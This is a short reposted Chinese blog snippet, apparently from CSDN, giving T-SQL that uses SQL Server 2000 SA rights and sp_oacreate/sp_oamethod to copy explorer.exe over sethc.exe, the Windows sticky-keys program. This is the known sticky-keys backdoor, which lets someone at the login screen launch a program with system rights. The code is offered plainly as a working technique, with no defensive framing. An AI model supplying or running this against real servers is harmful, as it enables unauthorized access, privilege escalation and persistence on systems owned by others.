declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';
SQL 2000 SA替换Shift程序
猜你喜欢
转载自blog.csdn.net/ztlove9481731/article/details/7389084
今日推荐
周排行